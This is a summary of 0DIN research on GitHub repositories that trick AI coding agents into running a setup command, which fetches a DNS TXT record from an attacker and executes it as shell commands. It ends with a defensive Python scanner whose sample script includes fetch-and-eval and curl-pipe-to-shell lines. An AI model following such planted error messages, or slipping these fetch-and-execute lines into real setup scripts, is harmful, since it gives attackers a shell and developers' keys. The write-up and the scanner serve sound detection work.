Researchers at Mozilla's 0DIN platform discovered a technique where seemingly benign GitHub repositories trick AI coding agents into executing malicious payloads through a three-component attack chain. The repository contains standard setup instructions that generate an error prompting the agent to run an initialization command, which calls a script retrieving configuration values from a DNS TXT record controlled by the attacker and executes them as commands. The method requires no malicious code in the cloned repository, with the agent automating the entire process while treating the actions as normal error recovery steps.
If successful, attackers gain an interactive shell with the developer's privileges, with access to environment variables, API keys, and local configuration files. Claude Code never directly opens a shell; it follows three indirection steps: trusting an error message, fetching a value, and executing the contents of a DNS record it never sees. The attack remains invisible to security scanners, AI agents, and human reviewers, since it needs no exploit code and no suspicious commands that would require approval. Threat actors could distribute such repositories through fake job postings, tutorials, or direct messages. 0DIN recommends that AI agents disclose the full execution chain of setup commands, including scripts and code fetched dynamically at runtime. The technique exploits agentic AI's trust in error messages and its automated error recovery process.
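As an added example (not part of 0DIN's write-up), a small Python heuristic a defender could run over a repository's setup scripts before an agent is allowed to execute them: it flags the resolve-and-execute pattern the researchers describe, whether the DNS TXT lookup is piped straight into a shell or first stored in a variable that is later passed to eval, and also flags plain download-and-pipe-to-shell lines. The sample script below is constructed for illustration and uses a reserved `.invalid` domain.

```python
"""Flag setup-script lines that hand dynamically fetched text (DNS TXT
records or remote downloads) to a shell. Heuristic, line-based scan."""
import re
from typing import List, Set, Tuple

# DNS TXT lookups via common resolvers; match the command up to a separator.
TXT_LOOKUP = re.compile(
    r"\b(?:dig\b[^|;&`)]*\bTXT\b|nslookup\b[^|;&`)]*-(?:type|query)=TXT\b"
    r"|host\b[^|;&`)]*-t\s+TXT\b)", re.IGNORECASE)
# Remote content fetchers used in the same role.
REMOTE_FETCH = re.compile(r"\b(?:curl|wget)\b[^|;&`)]*")
# Variable assigned from a command substitution: NAME=$(...) or NAME=`...`
ASSIGN = re.compile(r"^\s*(?:export\s+)?([A-Za-z_][A-Za-z0-9_]*)=(?:\$\(|`)")
# Sinks that turn text into executed commands (heuristic; 'exec' may false-positive).
SHELL_SINK = re.compile(
    r"\|\s*(?:sudo\s+)?(?:ba|z|da|k)?sh\b|\b(?:eval|source|exec)\b|\b(?:ba)?sh\s+-c\b")

def scan_script(text: str) -> List[Tuple[int, str]]:
    """Return (line_number, reason) for each line that executes fetched text."""
    findings: List[Tuple[int, str]] = []
    tainted: Set[str] = set()  # variables holding TXT-record / download output
    for lineno, line in enumerate(text.splitlines(), start=1):
        code = line.split("#", 1)[0]  # drop shell comments (approximation)
        is_txt = bool(TXT_LOOKUP.search(code))
        is_fetch = bool(REMOTE_FETCH.search(code))
        has_sink = bool(SHELL_SINK.search(code))
        if (is_txt or is_fetch) and has_sink:
            src = "DNS TXT record" if is_txt else "remote download"
            findings.append((lineno, f"{src} output executed by a shell"))
            continue
        m = ASSIGN.match(code)
        if m and (is_txt or is_fetch):
            tainted.add(m.group(1))  # remember where fetched text is stored
            continue
        if has_sink:
            for var in tainted:
                if re.search(rf"\$\{{?{var}\b", code):
                    findings.append((lineno, f"variable ${var} (from dynamic fetch) executed"))
                    break
    return findings

# Constructed sample setup script (hypothetical, not from any real repository).
SAMPLE_SETUP = """\
#!/bin/sh
# constructed sample for the scanner
npm install
CONFIG=$(dig +short TXT config.example.invalid)
eval "$CONFIG"
curl -fsSL https://example.invalid/setup.sh | sh
echo "done"
"""

if __name__ == "__main__":
    for n, why in scan_script(SAMPLE_SETUP):
        print(f"line {n}: {why}")
```

The two-step variable case is the one worth watching: neither the lookup line nor the eval line looks dangerous on its own, which is exactly why a reviewer or an agent skimming for "suspicious commands" misses it.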
